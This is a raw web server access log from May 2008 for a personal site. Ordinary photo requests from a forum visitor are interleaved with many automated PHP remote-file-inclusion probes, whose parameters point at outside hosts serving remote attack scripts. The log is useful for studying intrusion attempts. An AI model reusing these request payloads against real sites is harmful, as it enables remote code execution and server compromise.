68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:10:01:43 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:48 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:48 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:48 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:48 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:48 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:49 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:49 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
66.7.207.158 - - [02/May/2008:10:01:50 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:01:50 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:01:50 -0700] "GET //modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:01:50 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:01:58 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:01:59 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:59 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:00 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:00 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:00 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:00 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:00 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:02:07 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:02:10 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:14 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:14 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:15 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:02:15 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:02:16 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:16 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:16 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:02:17 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:02:17 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:20 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:20 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:21 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:21 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:21 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:02:21 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:02:24 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:02:25 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:02:25 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.241.231 - - [02/May/2008:10:02:33 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.241.231 - - [02/May/2008:10:02:34 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:10:02:42 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
204.10.241.231 - - [02/May/2008:10:02:43 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.241.231 - - [02/May/2008:10:02:43 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:10:02:50 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:10:02:50 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:10:02:50 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:03:13 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:10:03:18 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:03:26 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:03:26 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:03:27 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:03:30 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:03:30 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:03:31 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.1.46 - - [02/May/2008:10:03:36 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.1.46 - - [02/May/2008:10:03:36 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:03:55 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:04:01 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:04:08 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:04:13 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:04:13 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:04:44 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.243.228 - - [02/May/2008:10:04:45 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.190.243.228 - - [02/May/2008:10:04:45 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:04:48 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:10:04:56 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:10:04:56 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:05:01 -0700] "GET /logs/access_080313.log/modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:05:01 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:05:02 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:05:27 -0700] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:05:28 -0700] "GET //ashnews.php?pathtoashnews=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
76.66.27.82 - - [02/May/2008:10:05:35 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:05:57 -0700] "GET /logs/access_080304.log/modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:06:03 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:06:03 -0700] "GET //ashnews.php?pathtoashnews=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:06:03 -0700] "GET /logs//ashnews.php?pathtoashnews=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:06:05 -0700] "GET /logs/index.php?x=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:06:14 -0700] "GET /index.php?x=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:06:19 -0700] "GET /logs//ashnews.php?pathtoashnews=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:06:19 -0700] "GET //ashnews.php?pathtoashnews=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.207.158 - - [02/May/2008:10:06:33 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.207.158 - - [02/May/2008:10:06:33 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:06:52 -0700] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:10:06:53 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:06:53 -0700] "GET /logs/access_080313.log/modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:06:53 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:06:54 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:06:56 -0700] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:10:06:57 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:10:06:58 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:07:15 -0700] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:10:07:45 -0700] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:47 -0700] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
